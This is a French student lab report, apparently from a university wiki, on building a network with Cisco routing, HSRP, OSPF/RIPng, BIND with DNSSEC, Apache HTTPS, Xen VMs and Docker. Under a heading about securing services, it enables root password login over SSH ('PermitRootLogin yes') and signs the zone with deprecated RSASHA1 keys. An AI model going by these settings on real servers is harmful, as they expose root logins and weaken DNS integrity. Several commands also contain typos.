=====Liaison COM-1 vers R2=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
 interface GigabitEthernet1/2&lt;br /&gt;
  switchport&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers Borne Wifi=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/4&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=====Management=====&lt;br /&gt;
&lt;br /&gt;
====Configuration du Routeur 1 (R1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des Réseaux virtuels=====&lt;br /&gt;
La notion de Bridge Domain Interface (BDI)&lt;br /&gt;
&lt;br /&gt;
HSRP: Hot standby router protocol [https://en.wikipedia.org/wiki/Hot_Standby_Router_Protocol plus]&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface BDI101&lt;br /&gt;
   ip address 10.60.101.1 255.255.255.0                # adresse IPv4 locale&lt;br /&gt;
   standby version 2                                   # utilisation du protocol HSRP version 2 pour la haute disponibilité dans le cas où un routeur tombe en panne&lt;br /&gt;
   standby 101 ip 10.60.101.3                          # on définit un standby group pour cette interface avec l'adresse du routeur virtuel&lt;br /&gt;
   standby 101 preempt                                 # fait en sorte que le routeur actif avec la plus grande priorité prenne en charge le routage par préemption sur ce groupe &lt;br /&gt;
   ipv6 address 2001:660:4401:60A1::/64 eui-64         # configuration des adresses IPv6&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  interface BDI102&lt;br /&gt;
   ip address 10.60.102.1 255.255.255.0&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 102 ip 10.60.102.3&lt;br /&gt;
   standby 102 preempt&lt;br /&gt;
   ipv6 address 2001:660:4401:60A2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI103&lt;br /&gt;
  ip address 10.60.103.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 103 ip 10.60.103.3&lt;br /&gt;
  standby 103 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI104&lt;br /&gt;
  ip address 10.60.104.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 104 ip 10.60.104.3&lt;br /&gt;
  standby 104 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI105&lt;br /&gt;
  ip address 10.60.105.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 105 ip 10.60.105.3&lt;br /&gt;
  standby 105 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 105 par le R1&lt;br /&gt;
  standby 105 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI106&lt;br /&gt;
  ip address 10.60.106.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 106 ip 10.60.106.3&lt;br /&gt;
  standby 106 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 106 aussi par le R1&lt;br /&gt;
  standby 106 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI131&lt;br /&gt;
  ip address 192.168.222.10 255.255.255.248&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI200&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 200 ip 193.48.57.190&lt;br /&gt;
  standby 200 preempt&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers Réseau école =====&lt;br /&gt;
 interface GigabitEthernet0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  media-type rj45&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 131 ethernet&lt;br /&gt;
   encapsulation dot1q 131&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain 131&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-1 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/1 , et pour '''&amp;lt;NUMERO&amp;gt;''' ={ 101, 102, 103, 104, 105, 106, 200 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-2 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/2&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/2, et pour '''&amp;lt;NUMERO&amp;gt;''' = { 101, 102, 103, 104, 105, 106, 200 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Configuration Générale=====&lt;br /&gt;
Un routeur proposent différents protocoles de routage &lt;br /&gt;
 '''routerE304(config)'''#router ?                                                                                                                                     &lt;br /&gt;
   bgp       Border Gateway Protocol (BGP)                                                                                                                       &lt;br /&gt;
   eigrp     Enhanced Interior Gateway Routing Protocol (EIGRP)                                                                                                  &lt;br /&gt;
   isis      ISO IS-IS                                                                                                                                           &lt;br /&gt;
   iso-igrp  IGRP for OSI networks                                                                                                                               &lt;br /&gt;
   mobile    Mobile routes                                                                                                                                    &lt;br /&gt;
   odr       On Demand stub Routes                                                                                                                               &lt;br /&gt;
   ospf      Open Shortest Path First (OSPF)                                                                                                                     &lt;br /&gt;
   ospfv3    OSPFv3                                                                                                                                              &lt;br /&gt;
   rip       Routing Information Protocol (RIP)&lt;br /&gt;
&lt;br /&gt;
Nous allons en utiliser quelques uns dans notre implémentation&lt;br /&gt;
======OSPF pour IPv4======&lt;br /&gt;
Open Shortest Path First (OSPF) est un protocol qui permet à des routeurs adjacents dans un même domaine d'administration de s'échanger des informations sur le réseau et sa topologie. Cet échange d'information introduit une notion de voisinage entre routeurs. Les informations échangées (LSBD), permettent aux différents routeurs d'ajuster leurs tables de routage et de choisir les meilleures routes sur la base du coût de transmission. [https://en.wikipedia.org/wiki/Open_Shortest_Path_First Plus]&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.100.1                                 # un id pour le routeur. c'est comme ça qu'il s'identifie auprès de ses voisins                                                                                   &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # on définie les adresses que l'on souhaite diffuser aux voisins                                                                                                             &lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise   # Celles que l'on veut pas diffuser (c'est notre précieux...)                                                                                                         &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés                                                                                                                               &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # délimite le domaine OSPF sur lequel on diffuse pour ne pas surcharger la bases de données de routeurs&lt;br /&gt;
&lt;br /&gt;
======RIP pour IPv6====== &lt;br /&gt;
''Routing Information Protocol'' pour l'échange d'information de routage. Ceci permet de router les paquets entre les routeurs de notre infrastructure avec le minimum de sauts (chemin le plus court).&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  ipv6 router rip tpima5sc             # un identifiant pour le process RIP que nous voulons configurer                                                                                                                               &lt;br /&gt;
   redistribute connected metric 1     # on autorise la diffusion des routes connectées au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute static metric 1        # on autorise la diffusion des routes définies en statique au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute rip 1 metric 1         # on autorise la diffusion des routes sous le protocole rip 1&lt;br /&gt;
&lt;br /&gt;
Vous pouvez faire un diagnostique des routes connues et leur sources une fois que l'interconnexion avec le réseau de l'école est configurée.&lt;br /&gt;
 '''routerE304#'''sh ip route ospf 1          &lt;br /&gt;
 Codes: L - local, C - connected, S - static, '''R - RIP''', M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, '''O - OSPF''', IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route, H - NHRP, l - LISP&lt;br /&gt;
        a - application route&lt;br /&gt;
        + - replicated route, % - next hop override, p - overrides from PfR&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
 O*E2  0.0.0.0/0 [110/1] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
       10.0.0.0/8 is variably subnetted, 85 subnets, 8 masks&lt;br /&gt;
 O E2     10.0.8.0/24 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.11.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.17.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.18.0.0/22 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.0.0/17 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.252.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.254.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.22.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.24.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
  --More--&lt;br /&gt;
======Configuration du spanning tree======&lt;br /&gt;
Pour eviter que l'apparition de boucles dans notre infrastructure nous devons activer le protocole spanning-tree.&lt;br /&gt;
En effet, dans les réseaux commutés Ethernet la présence de boucle génère des tempêtes de diffusion qui paralysent le réseau : tous les liens sont saturés de trames de diffusion qui tournent en rond dans les boucles et les tables d'apprentissage des commutateurs (switch) deviennent instables. [https://fr.wikipedia.org/wiki/Spanning_Tree_Protocol plus] &lt;br /&gt;
&lt;br /&gt;
 spanning-tree mode pvst                # utilisation du protocole de planning tree en mode par Vlan (per vlan spanning tree)                                                                                                                         &lt;br /&gt;
 spanning-tree extend system-id         # utilisation du standard system-id pour l'assignation des identifiants uniques&lt;br /&gt;
&lt;br /&gt;
======unicast IPv6======&lt;br /&gt;
On active unicast IPv6 permettant de router les addresses IPv6 unicast Global (2001:...) que nous avons choisis.&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation du réseau ===&lt;br /&gt;
&lt;br /&gt;
==Services Internet == &lt;br /&gt;
&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la VM une première fois,  il faut utiliser la commande :&lt;br /&gt;
 xl console mycoplasma  --depuis cordouan.&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser les services réseaux il faut être capable de se connecter à la VM en SSH, il faut faire quelques modifications dans le fichier etc/ssh/sshd_config de la VM. Voici la modification : &lt;br /&gt;
  #PermitRootLogin prohibit-password&lt;br /&gt;
par&lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Par la suite, il sera possible d'accéder à la VM directement : &lt;br /&gt;
 ssh root@193.48.57.178&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS ===&lt;br /&gt;
&lt;br /&gt;
Nous avons utiliser le registrar Gandi (http://www.gandi.net) pour réserver notre nom de domaine, nous avons choisi mycoplasma2.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, faire apparaitre dans le fichier /etc/bind/named.conf.options la ligne suivante: &lt;br /&gt;
 dnssec-validation auto;&lt;br /&gt;
&lt;br /&gt;
====Configuration apache ====&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/apache2/sites-available/loadbalance.conf &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:443&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site	&lt;br /&gt;
 	DocumentRoot /var/www/html/&lt;br /&gt;
 	ServerAdmin lina.mejbar@polytech-lille.net&lt;br /&gt;
 	SSLEngine on&lt;br /&gt;
 	SSLCertificateFile /etc/ssl/certs/mycoplasma2.site.crt&lt;br /&gt;
  	SSLCertificateKeyFile /etc/ssl/private/myserver.key &lt;br /&gt;
 	SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 	SSLVerifyClient None&lt;br /&gt;
 	ErrorLog ${APACHE_LOG_DIR}/lb-error.log&lt;br /&gt;
 	CustomLog ${APACHE_LOG_DIR}/lb-access.log combined&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:80&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site&lt;br /&gt;
 	ProxyPass &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
  	ProxyPassReverse &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
 	Redirect &amp;quot;/&amp;quot; &amp;quot;https://www.mycoplasma2.site&amp;quot;&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin pour enregistrer nos modifications :&lt;br /&gt;
  a2enmod ssl&lt;br /&gt;
  a2ensite mycoplasma2.site.conf&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir sur la photo ci-dessous : nous avons accès à notre site de façon sécurisée.&lt;br /&gt;
[[Fichier:groupe2_https.png|center|500px|Nous avons accès au site sécurisé]]&lt;br /&gt;
&lt;br /&gt;
====Configuration bind9====&lt;br /&gt;
&lt;br /&gt;
BIND veut dire : Berkeley Internet Name Daemon&lt;br /&gt;
Nous avons déjà installer le package [http://www.example.com/ titre du lien ici].&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut créer un fichier de configuration dans le dossier /etc/bind/ avec les informations de notre site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800 &lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
  			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @       IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Il faut modifier le fichier named.conf.local pour lui donner le nom de notre fichier configuration et de définir les paramètres généraux d'une zone.:&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/mycoplasma2.site&amp;quot;; &lt;br /&gt;
         allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite relancer avec la commande suivante :&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Il faut aussi ajouter dans l'onglet GlueRecords le nom de domaine de notre site, et celui de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
On doit configurer apache2 en mode sécurisé à l’aide d’une clef asymétrique et d’un certificat signé par une autorité de certification. Le CA signe un CSR (Certificate Signing Request), pour ce faire il faut créer les clefs et le CSR en utilisant openssl. &lt;br /&gt;
Il faut ensuite le transformer en un certificat, on va donc configurer apache2 sur le port 443 afin qu'il puisse gérer du HTTPS. &lt;br /&gt;
&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite renseigner quelques informations : &lt;br /&gt;
&lt;br /&gt;
   Country Name (2 letter code) [AU]: '''France'''&lt;br /&gt;
   State or Province Name (full name) [Some-State]: '''Haut de France'''&lt;br /&gt;
   Locality Name (eg, city) []: '''Lille'''&lt;br /&gt;
   Organization Name (eg, company) [Internet Widgits Pty Ltd]: '''Polytech Lille'''&lt;br /&gt;
   Organizational Unit Name (eg, section) []: IMA5&lt;br /&gt;
   Common Name (e.g. server FQDN or YOUR name) []: '''mycoplasma2.site'''&lt;br /&gt;
   Email Address []:&lt;br /&gt;
   Please enter the following 'extra' attributes to be sent with your certificate request&lt;br /&gt;
   A challenge password []:&lt;br /&gt;
   An optional company name []:&lt;br /&gt;
&lt;br /&gt;
La seule vraie ligne où il ne faut pas se tromper, c'est celle où l'on indique le nom du site (Common Name), si la ligne est fausse Gandi n'acceptera pas votre clef.&lt;br /&gt;
Une fois ces informations renseignées, une clef est générée. &lt;br /&gt;
&lt;br /&gt;
/!\ Il faut la garder précieusement et ne pas la SUPPRIMER des fichiers de la machine virtuelle, dans ce cas il faudra tout recommencer avec un nouveau nom de domaine parce que la clef n'est générable qu'une seule fois.&lt;br /&gt;
Il faut maintenant copier le contenu de ce fichier avec le &amp;quot;BEGIN CERTIFICATE REQUEST-----&amp;quot; et le &amp;quot;END CERTIFICATE REQUEST-----&amp;quot; sur le site de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
 root@mycoplasma:/etc/bind# vim named.conf&lt;br /&gt;
&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.options&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.local&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.default-zones&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Pour générer les clefs dans un même dossier, il faut le créer voici le chemin pour notre groupe :&lt;br /&gt;
 root@mycoplasma:/etc/bind/mycoplasma2.site.dnssec# &lt;br /&gt;
&lt;br /&gt;
Pour générer les clés KSK on lance la commande suivante :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE mycoplasma2.site&lt;br /&gt;
Pour ZSK :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1048 -n ZONE mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
On peut maintenant rajouter nos clefs dans le fichier mycoplasma2.site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-ksk.key'''&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-zsk.key'''&lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
 			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @      IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone en exécutant la commande suivante :&lt;br /&gt;
 dnssec-signzone -o mycoplasma2.site -k mycoplasma2.site-ksk ../mycoplasma2.site mycoplasma2.site-zsk&lt;br /&gt;
&lt;br /&gt;
Dernière étape, il fait ajouter le chemin du fichier pour utiliser le fichier de zone signé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        '''file &amp;quot;/etc/bind/mycoplasma2.site.signed&amp;quot;;''' &lt;br /&gt;
        allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous vérifions sous dnsviz.net le bon fonctionnement du DNSSEC :&lt;br /&gt;
[[Fichier:groupe2_dnsViz.png|center|500px]]&lt;br /&gt;
&lt;br /&gt;
===Serveur Freeradius===&lt;br /&gt;
&lt;br /&gt;
==Ferme de serveurs Web==&lt;br /&gt;
Il faut implanter une architecture d’équilibrage de charge pour un site Web.&lt;br /&gt;
&lt;br /&gt;
===Architecture générale de la ferme===&lt;br /&gt;
Pour ce faire, chaque binôme a créé une nouvelle machine virtuelle Xen qui hébergera un serveur Web. Ainsi chaque binôme pourra disposer de plusieurs serveurs Web proposant exactement le même site sur plusieurs machines différentes. Ces serveurs Web ne seront pas directement disponibles d’Internet mais au travers d’un équilibreur de charge tournant sur leur machine virtuelle principale.&lt;br /&gt;
&lt;br /&gt;
'''Nom de la Machine Virtuelle ''' : private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
'''Commandes''': &lt;br /&gt;
La MV doit être créée sur Cordouan.&lt;br /&gt;
 root@zabethX:~# ssh root@cordouan.insecserv.deule.net &lt;br /&gt;
&lt;br /&gt;
 root@cordouan:~# xen-create-image --hostname=private-mycoplasma --ip=ip 192.168.0.2 --dir=/usr/local/xen&lt;br /&gt;
 root@cordouan:~# xl create private-mlycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
Il faut suivre les logs de la création de la machine virtuelle avec le fichier suivant:&lt;br /&gt;
 root@cordouan:~# tail -f /var/log/xen-tools/private-mycoplasma.log&lt;br /&gt;
&lt;br /&gt;
Pour accèder une première fois à la machine virtuelle, il faut utiliser cette commande car SSH n'est pas encore autorisé.&lt;br /&gt;
 root@cordouan:~# xl console private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
Pour l'activer voici les modifications, il faut remplacer la ligne suivante de ce fichier /etc/ssh/sshd_config :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot;  '''par'''  &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
&lt;br /&gt;
Il est possible de se connecter en SSH  et de paramétrer le proxy : &lt;br /&gt;
 root@cordouan:~# ssh root@192.168.0.2&lt;br /&gt;
 root@private-mycoplasma:~# export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# export https_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# xen-create-image --hostname=herpesgenital --dhcp --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
Il faut modifier l'adresse mac, pour avoir une adresse mac unique pour chaque binôme, et il faut configurer le bridge.&lt;br /&gt;
 vif = [ 'mac=00:16:3E:2B:FF:6A,bridge=IMA5sc-priv' ]&lt;br /&gt;
&lt;br /&gt;
Voici notre nouvelle structure :&lt;br /&gt;
[[Fichier:G2_Structure.png|center|800px]]&lt;br /&gt;
&lt;br /&gt;
Pour y arriver, il faut modifier les fichiers /etc/network/interfaces des deux machines virtuelles avec les adresses, Gateway, et netmask marque sur la photo ci-dessus. Et valider les modifications avec les commandes habituelles : ifdown eth'''i''' et ifup eth'''i'''&lt;br /&gt;
&lt;br /&gt;
=== Mascarade ===&lt;br /&gt;
&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.0.0/24&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.0.0/24&lt;br /&gt;
 iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.0.0/24&lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
 apt install iptables-persistent&lt;br /&gt;
 &lt;br /&gt;
Il faut ensuite décommenter &lt;br /&gt;
 net.ipv4.ipforward=1&lt;br /&gt;
&lt;br /&gt;
=== Création du conteneur ===&lt;br /&gt;
&lt;br /&gt;
Il est important dans cette partie que tous les binômes se mettent d'accord pour installer le même package de docker &lt;br /&gt;
 root@mycoplasma:~/#  ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Voici le fichier DockerFile que l'on a codé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~/test# cat docker/Dockerfile &lt;br /&gt;
&lt;br /&gt;
 FROM centos:latest&lt;br /&gt;
 MAINTAINER NewstarCorporation&lt;br /&gt;
 RUN yum -y install httpd&lt;br /&gt;
 COPY mycoplasma/index.html /var/wwww/html/index.html&lt;br /&gt;
 CMD [&amp;quot;/usr/sbin/httpd&amp;quot;, &amp;quot;-D&amp;quot;, &amp;quot;FOREGROUND&amp;quot;]&lt;br /&gt;
 EXPOSE 80&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On a eu le problème suivant lorsqu'on souhaite visiter notre site : &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_mycoplasmaSite.png|center|900px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker ps =&amp;gt; Notre docker &amp;quot;mycoplasma&amp;quot;  tourne donc  ce n'est pas le problème.&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker exec -it &amp;lt;CONTAINER ID&amp;gt; /bash/bin &lt;br /&gt;
 root@&amp;lt;CONTAINER ID&amp;gt;:~/# ls /var/www/html &lt;br /&gt;
&lt;br /&gt;
Avec cette dernière commande, on peut voir que le fichier index.html ne s'est pas copié malgré les commandes du Dockerfile. Pourtant le Docker build s'est exécuté sans afficher d'erreurs. On peut voir les logs pour avoir une idée : &lt;br /&gt;
  root@corduan:~/# docker logs &amp;lt;CONTAINER ID&amp;gt;&lt;br /&gt;
Voici le résultat : &lt;br /&gt;
 AH00558: httpd: Could not reliably determine the server's fully qualified domain name, using 172.17.0.5. Set the 'ServerName' directive globally to suppress this message&lt;br /&gt;
